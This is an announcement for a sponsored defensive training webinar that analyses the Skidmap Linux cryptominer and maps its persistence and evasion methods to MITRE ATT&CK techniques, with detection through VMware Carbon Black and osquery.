In this “Anatomy of a Hack” episode, we turn to the Linux world and dissect Skidmap malware. Skidmap is technically a cryptominer, but it’s very valuable as an example of typical Linux attack methods that any attacker could use, including:
- Cron jobs
- Pluggable authentication modules
- Kernel modules
- Secure shell keys
- Scripts
In this real-training-for-free event, we will show you how Skidmap works and explore its behavior and the details of its various elements. We will map elements of Skidmap to 8 different MITRE ATT&CK techniques across 5 tactics:
|
TID
|
Tactic
|
Technique
|
|
T1168
|
Persistence, Execution
|
Local Job Scheduling
|
|
T1215
|
Persistence
|
Kernel Modules and Extensions
|
|
T1045
|
Defense Evasion
|
Software Packing
|
|
T1089
|
Defense Evasion
|
Disabling Security Tools
|
|
T1036
|
Defense Evasion
|
Masquerading
|
|
T1014
|
Defense Evasion
|
Rootkit
|
|
T1071
|
Command And Control
|
Standard Application Layer Protocol
|
|
T1496
|
Impact
|
Resource Hijacking
|
As you can see, Skidmap employs 4 different techniques to evade detection. In particular, it’s interesting how Skidmap hides the high CPU usage that cryptomining causes. We will be using an integrated version of OSQuery to look for artifacts like those left by Skidmap in VMware Carbon Black Audit & Remediation.
This will be a very technical and interesting session with insights from VMware Carbon Black’s Threat Analysis Unit (TAU). VMware Carbon Black is our sponsor, and Staff Solution Engineer Jon Nelson will briefly show you how, with VMware Carbon Black Enterprise EDR, you can detect techniques used by Skidmap to disable system protections and hides its network traffic. Jon will also demonstrate how you can use similar techniques to discover webshells with VMware Carbon Black Enterprise EDR.
Please join us for this real training for free session.